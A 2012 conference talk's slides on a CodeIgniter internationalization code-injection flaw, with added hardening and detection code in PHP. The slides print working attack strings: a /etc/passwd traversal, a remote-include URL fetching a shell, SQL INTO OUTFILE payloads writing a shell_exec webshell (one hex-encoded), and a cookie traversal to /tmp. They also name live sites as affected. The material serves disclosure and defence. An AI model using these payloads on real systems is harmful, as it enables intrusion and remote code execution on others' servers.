codeigniter i18n security flaw
CodeIgniter i18n Code Injection
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO
[email protected] / [email protected]
20 May 2012
Understand the Context
PHP
• Mostly used SSI (75%)
• 17 Years Maturity
• Open Source Nature
• Rapid Develop/Deploy
• Secure Core
• Insecure Libraries
• Low Level Web Development *
PHP Frameworks
• PHP low level web support
• Incorporation of Frameworks
• Much Used and Mature -> Secure
• Huge Codebase -> Insecure
• Developers, not Security guys
• Security-Oriented Frameworks (OWASP ESAPI)
CodeIgniter
• Most used Mid-level Framework
Internationalization
• i18n importance today
• Difficult implementation:
  – File-based (Wordpress, eFront, …)
  – Database (jFramework)
  – Code-based (CodeIgniter, …)
• Obsolete consumers -> No testing
Remote File Inclusion
RFI at a glance
• 3rd Most Common Vuln. in Top Ten 2007: Malicious File Inclusion
• Not in Top Ten 2010: Mostly Understood and Fixed
• Highest Impact (Run Arbitrary Code!)
• Common on Interpreted Languages
• Most Common in PHP (Why?)
RFI Example
<?php
$page = $_GET['page'];
include "./pages/{$page}.php";
Malicious Input:
Mysite.com?page=../../../etc/passwd%00
Where current dir is /var/www
include "/var/www/pages/../../../etc/passwd";
= include "/etc/passwd"; //show it on screen
RFI Cheatsheet
Use null character on input to terminate string:
include "./{$page}.you.cant.rfi.me.php";
Use absolute paths if input initiates include:
include "{$_GET['page']}";
page=http://abx.ir/shell.txt%00
allow_url_include
If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.
e.g. include "ftp://192.168.1.1/file.txt";
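The RFI example and the cheatsheet above both come down to one mistake: raw request input is concatenated into the path handed to include(). The following is an added example (not code from the slides) of the hardened form of that page loader. It assumes pages live under ./pages next to the script and that the valid page names are the constructed ALLOWED_PAGES list. Two caveats worth knowing when reading the cheatsheet: since PHP 5.3.4 a NUL byte in a path makes include() fail, but the traversal alone still works without it; and allow_url_fopen is on by default while allow_url_include has defaulted to Off since PHP 5.2, so the URL-wrapper case only applies where an administrator turned it on, which the last function checks for.

```php
<?php
// Added example, not from the slides: hardened replacement for
//   include "./pages/{$page}.php";
// Three independent controls are applied; any one failing aborts the include.
// Assumptions: pages live under ./pages relative to this script and the
// allowed page names are the constructed ALLOWED_PAGES list below.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// 1. Allow-list: the request may only select among names we enumerate.
//    This alone defeats traversal, NUL bytes and URL wrappers, because the
//    raw input is never used to build a path.
const ALLOWED_PAGES = ['home' => true, 'about' => true, 'contact' => true];

/**
 * Map the request parameter to a safe file path, or return null.
 */
function resolve_page(string $requested): ?string
{
    // 2. Syntactic check: only a short lowercase token is accepted.
    //    "%00" in the URL arrives as a literal NUL byte in $_GET; the
    //    character class rejects it, as it rejects "../", ":" and "/".
    if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $requested)) {
        return null;
    }
    if (!isset(ALLOWED_PAGES[$requested])) {
        return null;
    }
    $candidate = PAGES_DIR . '/' . $requested . '.php';

    // 3. Canonical containment: realpath() resolves symlinks and ".." and
    //    returns false for missing files, so the result must be a regular
    //    file whose canonical path still starts with the pages directory.
    $base = realpath(PAGES_DIR);
    $real = realpath($candidate);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

/**
 * Defence in depth for the allow_url_include slide: allow_url_include is a
 * PHP_INI_SYSTEM setting, so it cannot be turned off from script code, but a
 * script can refuse to run while an include() could fetch code over a URL.
 */
function url_include_disabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

// Usage: the controller that used to do `include "./pages/{$page}.php"`.
if (!url_include_disabled()) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}
$path = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($path === null) {
    http_response_code(404);
    exit('no such page');
}
include $path;
```

The allow-list is the control that matters; the regex and the realpath() containment check are there so that a later edit which drops the allow-list (say, to load pages from a database) still cannot reach outside the pages directory.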
Filter Parameters
• CodeIgniter has the fewest published exploits of all major PHP frameworks (commercial codebase)
• CodeIgniter filters dangerous characters such as ', ", /, ?, <, > on GET parameters, to prevent most XSS and injection attacks.
• CodeIgniter has a central module loader and an MVC pattern, preventing most RFIs.
Internationalization
• System/Core/Lang.php:
function load($langfile = '', $idiom = '', $return = FALSE, $add_suffix = TRUE, $alt_path = '')
{
    $langfile = str_replace('.php', '', $langfile);
    if ($add_suffix == TRUE)
    {
        $langfile = str_replace('_lang.', '', $langfile).'_lang';
    }
    $langfile .= '.php';
Internationalization (II)
    if (file_exists($package_path.'language/'.$idiom.'/'.$langfile))
    {
        include($package_path.'language/'.$idiom.'/'.$langfile);
        $found = TRUE;
        break;
    }
The $idiom is obtained from cookies as $_COOKIE['lang']
$langfile is the domain keyword, e.g. "sales"
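The load() excerpt shows $idiom flowing from a cookie straight into the include path, with only a file_exists() check in between. Below is an added example (not CodeIgniter's code and not the presenter's) of the constraints the two inputs need before they reach include(). It assumes the language/<idiom>/<keyword>_lang.php layout from the slides, a cookie named lang as the slide states, and 'english' as the constructed default idiom; the APPPATH fallback definition is only there so the snippet runs outside a CodeIgniter install.

```php
<?php
// Added example, not CodeIgniter code: constraining the $idiom and $langfile
// inputs of a Lang::load()-style loader before include() sees them.
// Assumptions: APPPATH/language/<idiom>/<keyword>_lang.php layout, a cookie
// named 'lang' carrying the idiom, and 'english' as the default idiom.

declare(strict_types=1);

// Fallback so the snippet runs stand-alone; CodeIgniter defines APPPATH itself.
defined('APPPATH') or define('APPPATH', __DIR__ . '/application/');

/**
 * Idioms that actually exist on disk under $language_dir. Only plain
 * directory names are accepted, so a value such as '../../../../../tmp'
 * can never become a member of the allow-list.
 */
function available_idioms(string $language_dir): array
{
    $idioms = [];
    foreach (scandir($language_dir) ?: [] as $entry) {
        if (preg_match('/\A[a-z][a-z0-9_-]{1,31}\z/', $entry)
            && is_dir($language_dir . '/' . $entry)) {
            $idioms[] = $entry;
        }
    }
    return $idioms;
}

/**
 * The cookie may only select among known idioms, never name a path.
 * Anything else silently falls back to the default.
 */
function select_idiom(?string $cookie_value, array $available, string $default): string
{
    if ($cookie_value !== null && in_array($cookie_value, $available, true)) {
        return $cookie_value;
    }
    return $default;
}

/**
 * Build the language file path the way load() does, but refuse anything that
 * does not canonicalise to a regular file inside the idiom's own directory.
 */
function language_file_path(string $language_dir, string $idiom, string $keyword): ?string
{
    // The domain keyword ("sales", "common") must be a bare identifier; the
    // suffix is appended here rather than accepted from the caller.
    if (!preg_match('/\A[a-z][a-z0-9_]{0,63}\z/', $keyword)) {
        return null;
    }
    $base = realpath($language_dir . '/' . $idiom);
    $real = realpath($language_dir . '/' . $idiom . '/' . $keyword . '_lang.php');
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Usage, mirroring the slide's flow with the checks in place.
$language_dir = APPPATH . 'language';
$idiom = select_idiom(
    isset($_COOKIE['lang']) ? (string) $_COOKIE['lang'] : null,
    available_idioms($language_dir),
    'english'
);
$path = language_file_path($language_dir, $idiom, 'sales');
if ($path === null) {
    // A missing or tampered request must not fall through to include().
    error_log('language file rejected for idiom ' . $idiom);
} else {
    include $path;
}
```

Note that the allow-list is built from the directories that really exist, so deploying a new translation is still just dropping a directory in place; what changes is that the cookie can only choose among those directories, not describe a location.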
Local File Inclusion
• Useful to extract info. from target system
  – /etc/passwd
  – ./config/database.php
• Easy to exploit
Local Code Inclusion
• Requires a blind injection:
  – ' and 1=0 union select "<?php echo shell_exec($_REQUEST[q]); " into outfile "/tmp/sales_lang.php" --
  – CodeIgniter filters <? from input
  – ' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/common_lang.php" --
  – Caution: into outfile does not overwrite!
  – Where to find blind injection?
Local Code Inclusion (II)
• Now change cookie from
  – a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
  – To lang%22%3Bs%3A2%3A%22../../../../../tmp
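The two Local Code Inclusion slides describe a chain with two observable steps: a SQL injection that writes a file with a *_lang.php name (using unhex() to get "<?php" past the GET filter), and an idiom value carrying "../" so the loader walks to that file. The following is an added example, not part of the presentation, of detection rules for both steps run over constructed sample requests. It assumes values arrive URL-decoded as $_GET and $_COOKIE present them, and inspects the idiom as a plain string whether it is a standalone lang cookie as the slides say or an element unserialized from the session cookie shown above; the known-idiom list is constructed.

```php
<?php
// Added example, not from the slides: detection rules for the SQL-to-file
// write step and the traversal-in-idiom step, run over constructed requests.
// Assumption: parameter and cookie values are already URL-decoded.

declare(strict_types=1);

// Rules for the file-write step. unhex() is matched with the hex of "<?php"
// because the slides show it used to smuggle the open tag past GET filtering.
const SQL_FILE_WRITE_RULES = [
    'sql_outfile'   => '/into\s+(?:out|dump)file\b/i',
    'sql_unhex_php' => '/unhex\s*\(\s*[\'"]?3c3f706870/i',
    'php_open_tag'  => '/<\?(?:php)?\b/i',
];

/**
 * Inspect one request. $known_idioms is the allow-list of language
 * directories the application really ships. Returns the names of the rules
 * that fired, suffixed with the offending parameter; empty means clean.
 */
function inspect_request(array $params, array $cookies, array $known_idioms): array
{
    $hits = [];
    foreach ($params as $name => $value) {
        $value = (string) $value;
        foreach (SQL_FILE_WRITE_RULES as $rule => $re) {
            if (preg_match($re, $value)) {
                $hits[] = "$rule:$name";
            }
        }
    }
    foreach ($cookies as $name => $value) {
        $value = (string) $value;
        // "../" or "..\" anywhere, or a NUL byte, never belongs in an idiom.
        if (preg_match('~\.\.[/\\\\]~', $value) || strpos($value, "\0") !== false) {
            $hits[] = "traversal:$name";
        }
    }
    if (isset($cookies['lang']) && !in_array((string) $cookies['lang'], $known_idioms, true)) {
        $hits[] = 'unknown_idiom:lang';
    }
    return $hits;
}

// Constructed sample traffic: a normal request, the file-write step, and the
// traversal step from the slides.
const SAMPLE_REQUESTS = [
    ['params' => ['page' => 'sales'], 'cookies' => ['lang' => 'fa']],
    ['params' => ['id' => "' and 1=0 union select unhex(\"3c3f706870\") into outfile \"/tmp/common_lang.php\" -- "],
     'cookies' => ['lang' => 'fa']],
    ['params' => ['page' => 'sales'], 'cookies' => ['lang' => '../../../../../tmp']],
];

/**
 * Run every sample through the rules; returns [index => rule hits].
 */
function run_samples(): array
{
    $known = ['english', 'fa'];   // constructed allow-list
    $report = [];
    foreach (SAMPLE_REQUESTS as $i => $r) {
        $report[$i] = inspect_request($r['params'], $r['cookies'], $known);
    }
    return $report;
}

foreach (run_samples() as $i => $hits) {
    echo "request $i: ", $hits ? implode(', ', $hits) : 'clean', "\n";
}
```

The first sample reports clean; the second fires sql_outfile and sql_unhex_php on id; the third fires traversal and unknown_idiom on lang. The unknown_idiom rule is the one to keep even after the loader is fixed: a cookie naming an idiom that does not exist is the earliest signal that someone is probing the language loader.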
Remote Code Inclusion
• Look at the code:
  include($package_path.'language/'.$idiom.'/'.$langfile);
• You a hacker? tell me how!
Remote Code Inclusion (II)
$this->load->add_package_path()
Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:
$this->load->add_package_path(APPPATH.'third_party/foo_bar/');
http://codeigniter.com/user_guide/libraries/loader.html
Demonstration
CodeIgniter + i18n
• More than 240 sites discovered:
  – http://www.sedoparking.com
  – http://bambooinvoice.org/
  – http://www.haughin.com/
  – http://www.rapyd.com/
  – http://code-igniter.ru/
• And tons more…
Questions? Feedback?
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
[email protected] / [email protected]